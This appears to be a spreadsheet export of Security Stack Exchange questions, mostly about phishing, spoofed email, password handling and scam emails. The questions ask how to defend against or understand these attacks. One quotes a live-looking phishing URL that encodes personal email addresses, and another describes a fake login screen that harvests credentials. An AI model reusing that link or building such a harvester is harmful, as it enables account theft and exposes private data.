 &lt;p&gt;For it seems to me that it should be easy to send specific emails/voice messages saying call back on this number, but once you are on the call, there is really no verification of the dialed number, only the person calling. &lt;/p&gt;
 &lt;p&gt;What system could be devised to verify the receiving party is genuine as well, as they can easily fake a verification system for your responses, and testing them by telling incorrect information seems like shooting yourself in the foot, as it might get you locked out of your own account? &lt;/p&gt;
 &lt;p&gt;I know the current method of ensuring correct numbers is dialing the number at the back of your card, or from your statement, or from bank's website, but I am sure all that information can be modified in some way or other.&lt;/p&gt;
 &lt;p&gt;To add a bit to the discussion - &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Over the phone, all you hear is a person talking, and they can be persuasive, regardless of if they are genuine or not, that's why most scams work on the telephone, as there no other indicators of authenticity. &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Whereas online, you can see the SSL symbol, verify the domain name, and see their branding ...etc (admittedly this all can be duplicated as well, but is not at the same level of ease as duplicating a call script and a person).&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;At a branch - again you have the branding, and public visibility, professional staff (more than one, in a decent branch). These are legally protected as well from duplication. &lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Sophisticated phishing attacks have successfully used a combination of these to trick end-users. Usually &lt;a href="http://www.marketwatch.com/story/why-you-shouldnt-answer-the-phone-when-your-bank-calls-2017-03-30" rel="nofollow noreferrer"&gt;incoming calls&lt;/a&gt; are the chief suspect, but outbound calls could also be tricked is my guess. The reason i posted this question, was I got a similar incoming call from the fraud department and asked to verify with PIN, and I wasn't sure even after calling the legitimate number.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;account-security&gt;</t>
  </si>
  <si>
    <t>Why are FIDO2 protected SSH keys affected by phishing attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;The OpenSSH developers have written in a description of the &amp;quot;agent restrictions&amp;quot; feature that FIDO2 tokens are vulnerable to phishing attacks: &lt;a href="https://www.openssh.com/agent-restrict.html" rel="nofollow noreferrer"&gt;https://www.openssh.com/agent-restrict.html&lt;/a&gt;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;FIDO keys that require user-presence confirmation offer a little more defence, but are also similarly phishable.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;However, on the FIDO Alliance page it is written that FIDO2 tokens protect against phishing attacks: &lt;a href="https://fidoalliance.org/fido2/" rel="nofollow noreferrer"&gt;https://fidoalliance.org/fido2/&lt;/a&gt;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;This security model eliminates the risks of phishing, all forms of password theft and replay attacks.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Questions:&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Why are FIDO2 protected SSH keys affected by phishing attacks?&lt;/li&gt;
 &lt;li&gt;Is it already known how the phishing attack mentioned by
 OpenSSH is supposed to work?&lt;/li&gt;
 &lt;li&gt;Why is this not also true for SSH or why has SSH been vulnerable to phishing attacks so far?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ssh&gt;&lt;phishing&gt;&lt;openssh&gt;&lt;fido2&gt;</t>
  </si>
  <si>
    <t>Why are phishing attempts so obvious?</t>
  </si>
  <si>
    <t>&lt;p&gt;I understand that regular e-mail scams are dumb on purpose, to filter out smart people and make the processing of the replies easier. &lt;/p&gt;
 &lt;p&gt;But phishing is based on tricking people into thinking their bank (for instance) is talking to them. Yet almost every phishing e-mail I've ever seen is always visibly fake and poorly made. Why don't they just copy the bank's existing email/website template?&lt;/p&gt;
 &lt;p&gt;The accepted answer &lt;a href="https://security.stackexchange.com/questions/96121/why-do-phishing-emails-have-spelling-and-grammar-mistakes?rq=1"&gt;here&lt;/a&gt; mentions that &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;In phishing, as in scams, sending the initial batch of emails is the
  easy part. The hard part is coaxing information out of the target 
  (which can require a concerted exchange of emails).&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;But why? Isn't phishing specifically about obtaining credentials? Why would that require a manual exchange of emails?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Amazon sign in/sign up suspicious problems</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to sign up for Amazon Web Services. I went through the whole procedure and there were no issues. It told me to wait 24 hours until my account was activated. I came back the next day, and it wouldn't accept my password. I tried many times but there was no luck. I tried making a new account the next day with a sharklasers.com email address, but it still wouldn't accept after waiting another 24 hours.&lt;/p&gt;
 &lt;p&gt;The next day, I had given up, but well browsing the web I found something very suspicious. I was typing an IP address into the Omnibox and this ip came up in the previously viewed sites: &lt;a href="https://54.239.17.7/" rel="nofollow noreferrer"&gt;https://54.239.17.7/&lt;/a&gt;. What was even more suspicious was what it said next to it: Amazon.com - Online shopping etc. I clicked on the website, and chrome immediately blocked it because of 'phishing attempts' and 'connection intercepts'. It also said it can't verify the certificate is from amazon.com. &lt;/p&gt;
 &lt;p&gt;I have Bitdefender Network Security 2017 running on my computer and it is not reporting anything. How can I tell if my connection is being intercepted? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;aws&gt;</t>
  </si>
  <si>
    <t>Should I take action if I receive a phishing email that passes all email sender checks?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email that passed all the email sender checks (spf, dkim, dmarc), and the sent-from domain is a legitimate domain from a legitimate company. However, the email content itself was suspiciously phish-y. I even started to write a reply email advising they were mistaken, until I noticed that the reply-to was actually to another email domain. The reply-to domain goes nowhere and it's just a registered name with no hosted website, making me conclude this was indeed a phishing email.&lt;/p&gt;
 &lt;p&gt;Seeing that the legitimate companies' email security was compromised somehow, should I inform them? If so, how? Any information to give to the legitimate company about the phishing email?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Disallowing Similar Passwords</t>
  </si>
  <si>
    <t>&lt;p&gt;Upfront, I want to clarify that I am not a professional cryptographer, I am more curious about playing with the math and science behind it, and also want to improve my habits with my own personal and work data. I am not asking phishy questions to build a silly homebrew or anything like that.&lt;/p&gt;
 &lt;p&gt;I have been reading about the reasoning behind storing hashed passwords for a system's users and the requirements needed for that to fulfill the intent, namely, to slow the attacker down to acceptably low brute force speeds in the event of a breach. While there is a lot of info online, especially at this site, I have not seen this question answered yet.&lt;/p&gt;
 &lt;p&gt;I have had two acquaintances tell me something they experience at work. When their employers require password changes, they disallow &lt;em&gt;similar&lt;/em&gt; passwords to the last few, let's say the last 5. Now, disallowing exact matches is fine, because systems like bcrypt detect exact matches (how else would passwords work?), but it seems to me that if the system can detect similar passwords, like password12 and password34, that suggests that they are stored in a recoverable way.&lt;/p&gt;
 &lt;p&gt;Is this not insecure? Does this not mean that an attacker who gets both the database and the scripts can figure out how to also recover passwords, or at least detect the "closeness" of his guesses?&lt;/p&gt;
 &lt;p&gt;Do any of you pros out there know of systems that do this in a way considered secure by the profession? Thanks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;cryptography&gt;&lt;hash&gt;&lt;appsec&gt;</t>
  </si>
  <si>
    <t>In what ways do some banks inadequately advise their customers on online security?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm looking for specific examples of things such as:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Misleading, but common advice&lt;/li&gt;
 &lt;li&gt;Advice which has backfired&lt;/li&gt;
 &lt;li&gt;Advice which is just, quite simply, incorrect&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;which have been circulated time and time again, to the detriment of customer security.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;appsec&gt;&lt;professional-education&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Why do I receive phishing mails from my bank shortly after visiting the bank's site?</t>
  </si>
  <si>
    <t>&lt;p&gt;Sometimes I realize that I receive phishing emails just after doing some operations on the web.&lt;/p&gt;
 &lt;p&gt;For instance, I was trying to pay taxes from my bank account (website was trusted 100%, I checked the signature), just after a few minutes I receive a phishing email from bank with a fake email address.&lt;/p&gt;
 &lt;p&gt;Timing was very close with this operation I have performed. I had the same feeling in the past with other phishing emails, but I always thought was just a case. I wonder if there are some way / chance that this is not just a coincidence.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why is physical security key helpful, since most accounts have alternative 2FA methods a hacker could use?</t>
  </si>
  <si>
    <t>&lt;p&gt;I would like to know why a physical security key is useful to have as default 2FA method given most accounts have some form of account recovery/alternative 2FA method. Google has had a bunch of alternatives, for example.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;multi-factor&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Rate The Viability Of My Phish-Proof System</t>
  </si>
  <si>
    <t>&lt;p&gt;I have recently finished building my first (and so far only) phish-proof login system and I would like the experts to test it. The system is hosted at &lt;a href="http://www.daera.net/noph/nophlogin.htm" rel="nofollow"&gt;http://www.daera.net/noph/nophlogin.htm&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Is it easy or hard to copy the visual content of my page? Please state your answer for novice web programmers and experts. Thanks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Next steps to get rid of malware?</t>
  </si>
  <si>
    <t>&lt;p&gt;My father in law just had a problem,He clicked on a link in an email (he was using gmail on the version 35.0.1916.114m of Chrome), and suddenly the computer sort of went black, and possibly something downloaded. He says he didn't input his password. Later on, a whole bunch of phishing emails got sent out to his address book. &lt;/p&gt;
 &lt;p&gt;One of the links were to&lt;br&gt;
 &lt;code&gt;http:// 107.183.4.211 /d/?xo=fe&amp;amp;mucoto=Z3VsYWJpc3JhbmlAZ21haWwuY29t &amp;amp;id=c2hyYXlyYWdpQGdtYWlsLmNvbQ== &amp;amp;mesugomabeca=c2hyYXlyYWdp&lt;/code&gt; &lt;/p&gt;
 &lt;p&gt;He figured something was wrong and turned off the computer. When I turned it on, Windows 7 went into Safe Mode. I've since run a full scan using Microsoft Security Essentials - nothing shows up. There's nothing I found looking into Chrome history, or in the downloads folder. We've changed the important passwords and also moved to 2-factor authentication.&lt;/p&gt;
 &lt;p&gt;Any suggestions on what I should do next ?&lt;/p&gt;
 &lt;p&gt;Thanks
 Rahul&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;windows&gt;&lt;malware&gt;&lt;chrome&gt;&lt;phishing&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>What is the use of this spam email?</t>
  </si>
  <si>
    <t>&lt;p&gt;Monday morning, and I've opened my company email box to find this an e-mail with the following message (no HTML, just &lt;code&gt;text/plain&lt;/code&gt; - it was sent to a distribution group).&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Some of the headers:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;X-Mailer: Labourism v0.42
 To: Keren [suppressed] &amp;lt;webteam@[suppressed]&amp;gt;
 From: Fae [suppressed] &amp;lt;stilts@[suppressed]&amp;gt;
 Subject: gold of the t
 MIME-Version: 1.0
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &lt;code&gt;To&lt;/code&gt; name does not work here or has never worked here. There is no "Keren" in the webteam distribution group.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;gold of the t&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Osed to yield what is believed to be the only truth consistent with an intelligent conception of a just, loving, and wise God. The immediate cause of this determined conflict is found in Professor Briggs' recent address on the authority of the Holy Scriptures, delivered at his inaugural as Professor of Biblical Theology in the Union Theological Seminary of New York. In this notable address he maintai&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Since it's not phishing for anything, what is the purpose of this? It's obviously spam, but why send it if there is no purpose - and notice it's not asking directly or indirectly for a reply to check if the receiving inbox is monitored.&lt;/p&gt;</t>
  </si>
  <si>
    <t>"Secure" third-party inbox</t>
  </si>
  <si>
    <t>&lt;p&gt;My business sometimes receives emails from our clients that are sent through a "secure" third-party inbox. The client send the message through this third-party service. The third party creates an inbox for me and stores the message there. The third party then sends me an email at my normal address with a link to access the message in the "secure" inbox.&lt;/p&gt;
 &lt;p&gt;Some examples of providers of this service are Symantec Web Email Protection and Citrix sharefile.com. We collect a lot of payroll information and it seems like many payroll companies like paycor.com use this technique to send payroll data. Paycor appears to send these message through a Cisco service that appends "securemail03" to the front of the domain. You can see the login page here:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://securemail03.paycor.com"&gt;https://securemail03.paycor.com&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;My question is, how is this supposed to make the email more secure? If I accidentally forward an email sent directly to me, one email is possibly exposed to people who weren't supposed to see it, but if I accidentally forward the link to my "secure" inbox, anyone who gets the link has access to &lt;strong&gt;all&lt;/strong&gt; of the messages in my "secure" inbox. What am I misunderstanding?&lt;/p&gt;
 &lt;p&gt;To clarify, these are &lt;strong&gt;not&lt;/strong&gt; Spam or phishing messages we receive asking us to log in on a fake Dropbox or Google Drive page; they are legitimate emails. Additionally, these are &lt;strong&gt;not&lt;/strong&gt; large emails that are too big to send as an attachment. I don't want answers dealing with other benefits of sending the email through a third-party inbox; I just want to know what the &lt;strong&gt;security&lt;/strong&gt; benefits are.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Finding out if a series of job emails from the same person are a scam or a way of tracking/phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm Indian, and have received a third job email from a Canadian "Co-founder and COO". I'm not even actively job searching. &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;He hasn't mentioned how he got my mail id or why I'm the right fit
 for the job.&lt;/li&gt;
 &lt;li&gt;Google's "secret sauce" shows the yellow icon that probably indicates
 the email is not spam. &lt;a href="https://i.stack.imgur.com/qLZ3C.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/qLZ3C.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;The emails have images which GMail has hidden for safety reasons, and
 I was careful not to click on the "Display images below" link.&lt;/li&gt;
 &lt;li&gt;His email signature contains a "We're hiring" link that leads to:
 &lt;a href="https://hiscompany-dot-yamm-track.appspot.com/Redirect?ukey=1wQLKWIOnoiYyfDopetkntTdf7QKeYeABTwjUQf1vzCU-551884202&amp;amp;key=YAMMID-12656006&amp;amp;link=https%3A%2F%2Fhiscompany.io%2Fjoin-hiscompany%2F" rel="nofollow noreferrer"&gt;https://hiscompany-dot-yamm-track.appspot.com/Redirect?ukey=1wQLKWIOnoiYyfDopetkntTdf7QKeYeABTwjUQf1vzCU-551884202&amp;amp;key=YAMMID-12656006&amp;amp;link=https%3A%2F%2Fhiscompany.io%2Fjoin-hiscompany%2F&lt;/a&gt;. I didn't click it.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I ignored the first two emails because they almost exclusively speak of immigration, permanent residency and Canadian citizenship. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Questions:&lt;/strong&gt; &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Is there any danger in just replying to find out if the offer is genuine? It doesn't follow the &lt;a href="https://www.google.co.in/search?client=ubuntu&amp;amp;hs=lHN&amp;amp;ei=ChluXL2EF8TorQH82b24BQ&amp;amp;q=automated%20job%20offer%20email%20scams%20immigration&amp;amp;oq=automated%20job%20offer%20email%20scams%20immigration&amp;amp;gs_l=psy-ab.3...4532.6249..6459...0.0..0.268.2393.0j6j6......0....1..gws-wiz.......0i71.b5M9x0w2OQ4" rel="nofollow noreferrer"&gt;typical scam email pattern&lt;/a&gt;, but could just be an improvisation. This degree of persistence could also point to jobs that exploit people in exchange for Canadian citizenship. Perhaps even another &lt;a href="https://en.wikipedia.org/wiki/University_of_Farmington" rel="nofollow noreferrer"&gt;University of Farmington&lt;/a&gt;. &lt;/li&gt;
 &lt;li&gt;In case it's a scam, I believe the typical modus operandi would be to send a malicious PDF. I wonder if simply replying to him or clicking any of the links in his email would give him enough of info about my computer or phone to compromise it?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;For the reference of anyone who receives similar emails: &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Email 1: Feb 10, 2019&lt;/strong&gt;
 Subject: A Unique Machine Learning Opportunity in Canada&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Hi MyName,&lt;/p&gt;
  &lt;p&gt;My name is HisName and I‚Äôm the Head of Operations at HisCompany. We
  are a Canadian company currently hiring top-tier Software Engineers,
  Data Engineers, and Data Scientists. Our employees are based in
  Canada, and they are paired with U.S.-based start-ups on an exclusive,
  long-term basis. By doing this, we are combining the wonderful quality
  of life and immigration system that Canada offers with the technical
  opportunities of top Silicon Valley start-ups.&lt;/p&gt;
  &lt;p&gt;Beyond offering high-quality jobs, HisCompany also offers full-service
  immigration. We have partnered with the Canadian government to get
  successful candidates into Canada in as little as four weeks, and they
  each have a clear path to permanent residency status or Canadian
  citizenship.&lt;/p&gt;
  &lt;p&gt;If any of this sounds interesting, it would be great to hear back from
  you.&lt;/p&gt;
  &lt;p&gt;Thanks MyName,&lt;/p&gt;
  &lt;p&gt;-HisName&lt;/p&gt;
  &lt;p&gt;HisName Surname Co-Founder &amp;amp; COO HisCompany (We're Hiring) Canada: 
  403.xxx.xxxx USA: 650.xxx.xxxx&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Email 2: Feb 14, 2019&lt;/strong&gt;
 Subject: A Unique Machine Learning Opportunity in Canada&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Hi MyName,&lt;/p&gt;
  &lt;p&gt;I just wanted to follow up on the email I sent a few days ago about
  Machine Learning opportunities we have at HisCompany. I'm not sure if
  you've ever considered relocation to Canada, but it is easier than
  most people are aware. Our immigration team can usually get an
  engineer (and their family) immigration visas in as little as four
  weeks.&lt;/p&gt;
  &lt;p&gt;I'd be really excited to tell you more and answer any questions you
  might have, so if you're interested please let me know with a quick
  reply.&lt;/p&gt;
  &lt;p&gt;Thanks again MyName,&lt;/p&gt;
  &lt;p&gt;-HisName&lt;/p&gt;
  &lt;p&gt;HisName Surname Co-Founder &amp;amp; COO HisCompany (We're Hiring) Canada: 
  403.xxx.xxxx USA: 650.xxx.xxxx&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Email 3: Today&lt;/strong&gt;
 Subject: Reconnecting with you MyName&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Hi MyName,&lt;/p&gt;
  &lt;p&gt;Just in case my last message ended up in your spam folder, I wanted to
  reach out again. I'd love to take some time to tell you about some of
  the great Machine Learning opportunities for which we are hiring. &lt;/p&gt;
  &lt;p&gt;I'd love to have a quick chat to talk about this in more detail. 
  Would you be available in the next week to have a quick call?&lt;/p&gt;
  &lt;p&gt;Here is a link to our website if you want more information -
  &lt;a href="https://www.HisCompany.io/" rel="nofollow noreferrer"&gt;https://www.HisCompany.io/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Until next time MyName,&lt;/p&gt;
  &lt;p&gt;-HisName&lt;/p&gt;
  &lt;p&gt;HisName Surname Co-Founder &amp;amp; COO HisCompany (We're Hiring)&lt;br&gt;
  Canada: 403.xxx.xxxx USA: 650.xxx.xxxx&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;user-tracking&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>user15194</t>
  </si>
  <si>
    <t>Identify a user using random characters of the password</t>
  </si>
  <si>
    <t>&lt;p&gt;Assuming a password is not stored in plain-text, how is it possible that a support guy is able to identify during a phone call a customer by asking him random characters of his password?&lt;/p&gt;
 &lt;p&gt;For example, if the password is "password", the support guy asks for the first and fourth characters, the customer says 'p' and 's'. At this point, the support guy considers he's speaking with the legitimate customer.&lt;/p&gt;
 &lt;p&gt;The only solution that comes to my mind is that they are using plain-text passwords, but I hope that's no the case and that there is another solution, because it's a bank...&lt;/p&gt;
 &lt;p&gt;PS: It's a real scenario, no a phishing attempt.&lt;/p&gt;
 &lt;p&gt;EDIT: as Matthew said, without having access to their system is impossible to know what is going on. The goal of my question was to known if there are any known "public" methods to achieve this, not a custom made algorithm.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;identity&gt;&lt;confidentiality&gt;&lt;algorithm&gt;</t>
  </si>
  <si>
    <t>Shared terminal security hole</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to ask you about what I think is a pretty obvious security hole and what can be done about it.&lt;/p&gt;
 &lt;p&gt;Suppose my library has a room containing network-connected workstations serving Linux. You log on to them by typing your username and password. I create a program that mimics the login screen and sends the username and password typed to a server I control. The program then logs out.&lt;/p&gt;
 &lt;p&gt;I login to my library account and run this program and then I leave the computer. Next person comes along, logs in and voila! I now have this persons credentials. I can repeat this process as many times as I want and after I've gotten someone else's credentials I don't even need to login to my own account, making it impossible to track the phishing attack to me.&lt;/p&gt;
 &lt;p&gt;This above is obvious and I wonder why people aren't worried about it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;phishing&gt;&lt;credentials&gt;</t>
  </si>
  <si>
    <t>How to avoid referer information leakage during password reset</t>
  </si>
  <si>
    <t>&lt;p&gt;Most password reset systems involve emailing the user a one-time link that lets them reset their password. The token needs to be in the URL, as most email clients do not allow HTML emails to perform POST requests, and asking the user to retype the token is not an acceptable experience. However, this puts the token at risk of leakage through the referer header.&lt;/p&gt;
 &lt;p&gt;One potential solution to this is to avoid any external links on the password reset page. However, most sites have a standard template that does include external links (Facebook, Twitter, etc.) and not using this template would make the page look odd - and potentially make users think it is a phishing site.&lt;/p&gt;
 &lt;p&gt;It seems browser vendors are aware of this issue and &lt;a href="http://smerity.com/articles/2013/where_did_all_the_http_referrers_go.html" rel="noreferrer"&gt;some browsers&lt;/a&gt; support the meta referer tag, which can be set to "never" so the URL is never leaked. However, not all browsers support this tag, so it is not a complete solution.&lt;/p&gt;
 &lt;p&gt;So, how do you create a password reset process that does not have this leak?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;web-browser&gt;&lt;referer&gt;</t>
  </si>
  <si>
    <t>How do I obtain user info from SET?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to create a phishing email for a project I am on. In the email I want to link to a site that will collect IP, browser, date/time of when visited. nothing malicious but to just prove that users clicked the link. 
 Can I do this in social engineering toolkit or is it not possible?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;social-engineering&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is there a standard for fencing email domains to specific use cases?</t>
  </si>
  <si>
    <t>&lt;p&gt;To my knowledge, there's no common standard for sysadmins to publish trusted domains for specific use cases.&lt;/p&gt;
 &lt;p&gt;If it exists, I would presume that this might limit phishing attacks. Think of my question here as an extension of SPF/DMARC/DKIM, where you go beyond simply saying what domains are authorized to what each domain should be used for.&lt;/p&gt;
 &lt;p&gt;For instance, if I delegate support desk to zendesk.mydomain.com but Zendesk gets hacked and starts sending fake forgot password emails, you can mitigate that by telling email providers that zendesk.mydomain.com isn't designated for that purpose.&lt;/p&gt;
 &lt;p&gt;Beyond the infosec concern, I think this would yield some user experience benefits as well. Thinking of myself as an end user, I would want this feature so that I could proactively manage my inbox when signing up for a new website such as marketing emails, policy change announcements, order receipts, forgot password emails, etc. Without an official record to check, you have to guess. And even if you guess right, a sysadmin can change email addresses without giving any notice.&lt;/p&gt;
 &lt;p&gt;To illustrate the idea I'm looking for, there's a couple solutions I can think of that could achieve this:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;code&gt;robots.txt&lt;/code&gt; to suggest how bots engage with web content.&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;/.well-known/security.txt&lt;/code&gt; for contact info and standard operating procedure to notify admins of infosec concerns.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Would anyone happen to know of a solution that fits this use case? I feel like it's such an obvious thing that there should be something out there even if it's not exactly like the examples I've mentioned so far. Also interested to hear what problems or concerns complicate this idea.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;spam&gt;&lt;social-engineering&gt;&lt;standards&gt;</t>
  </si>
  <si>
    <t>Security concerns of user-provided relative URL in Location: header</t>
  </si>
  <si>
    <t>&lt;p&gt;This is &lt;a href="https://security.stackexchange.com/q/139840/9891"&gt;similar to this question&lt;/a&gt;, but a bit more specific.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;TL;DR;&lt;/strong&gt; Are there any security concerns with allowing user-provided relative URLs in the &lt;code&gt;Location:&lt;/code&gt; header on redirect?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Background:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I'm writing a small proxy for use in front of &lt;a href="http://couchdb.apache.org/" rel="nofollow noreferrer"&gt;CouchDB&lt;/a&gt;. To authenticate to the CouchDB API, one must submit a POST to the &lt;code&gt;/_session&lt;/code&gt; endpoint as described &lt;a href="http://docs.couchdb.org/en/2.0.0/api/server/authn.html#post--_session" rel="nofollow noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;This endpoint takes an optional query parameter, &lt;code&gt;next&lt;/code&gt;, which, when present, will cause a successful authentication request to respond with &lt;code&gt;302&lt;/code&gt; and a &lt;code&gt;Location:&lt;/code&gt; redirect, rather than a simple &lt;code&gt;200&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;Now CouchDB has what appears to me to be an insecure implementation of this. The &lt;code&gt;next&lt;/code&gt; value is simply appended to the server hostname (with no slash!!). So a request like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;POST /_session?next=foobar
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Will get a response which includes:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Location: http://someserver.comfoobar
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I think this is pretty clearly bad, but at least the damage is only limited to authenticated requests, so a random phisher probably can't do a lot with it. But it still makes me a bit uneasy.&lt;/p&gt;
 &lt;p&gt;So it seems to me that some validation needs to be done. At minimum, a &lt;code&gt;/&lt;/code&gt; should be pretended to the user-provided URL. But I'm thinking a simpler approach might be to simply validate that the user-provided URL is relative, and then just respond with that alone.&lt;/p&gt;
 &lt;p&gt;So for my example:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;POST /_session?next=foobar
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Would respond with:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Location: /foobar
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Is this a safe approach?&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;http&gt;&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>Have I really been hacked or am I falling for a phishing scam</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email on the 14th saying that a hacker has access to my pc it says that at the time of hacking my account (myemail@gmail.com) had this password (it was a version of my password but not one that I‚Äôve ever used for my gmail) and it claimed to have been watching me for months and that it had infected my pc through a adult website and had video of me when I was on the site doing you know what and that it would send it to my contacts and correspondence but I don‚Äôt have any contacts on my pc and also I use a different user and email when I do that, also why didn‚Äôt it send it to that email and not any of the other emails I have saved on my pc. Am I falling for a bullshit email or do I have something to worry about? Also it said I have 48 hours to pay them in bitcoins and that it would track when I opened it and start the countdown and I just opened it last night&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;account-security&gt;&lt;phishing&gt;&lt;data-leakage&gt;</t>
  </si>
  <si>
    <t>Is there anything I can do about IDN homograph attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have been reading about &lt;a href="https://en.wikipedia.org/wiki/IDN_homograph_attack" rel="nofollow noreferrer"&gt;IDN homograph attacks&lt;/a&gt;, and I cannot think of any better way to deal with them than&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Tell my users not to trust emails asking for passwords, etc&lt;/li&gt;
 &lt;li&gt;Buy all domains similar to mine (expensive and difficult)&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Is there really nothing else I can do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;attacks&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to tell if an email source is spoofed?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've received an email to my gmail account from FCMB, a bank in Nigeria (flashing warning lights already). It's not addressed to me (i.e., the email starts off "Dear Daniel," [not my name]). But the email address is mine. &lt;/p&gt;
 &lt;p&gt;When I look at the headers in Google, it really does look to me like Google received it directly from FCMB.com. Here's the relevant bit (I think):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;ARC-Authentication-Results: i=1; mx.google.com;
  spf=pass (google.com: domain of ebusiness@fcmb.com designates 41.223.147.112 as permitted sender) smtp.mailfrom=ebusiness@fcmb.com;
  dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=fcmb.com
 Return-Path: &amp;lt;ebusiness@fcmb.com&amp;gt;
 Received: from lin-smtp.fcmb.com (lin-smtp.fcmb.com. [41.223.147.112])
  by mx.google.com with SMTP id n5si1099097wmi.93.2019.09.04.11.31.49
  for &amp;lt;XXX@gmail.com&amp;gt;;
  Wed, 04 Sep 2019 11:31:50 -0700 (PDT)
 Received-SPF: pass (google.com: domain of ebusiness@fcmb.com designates 41.223.147.112 as permitted sender) client-ip=41.223.147.112;
 Authentication-Results: mx.google.com;
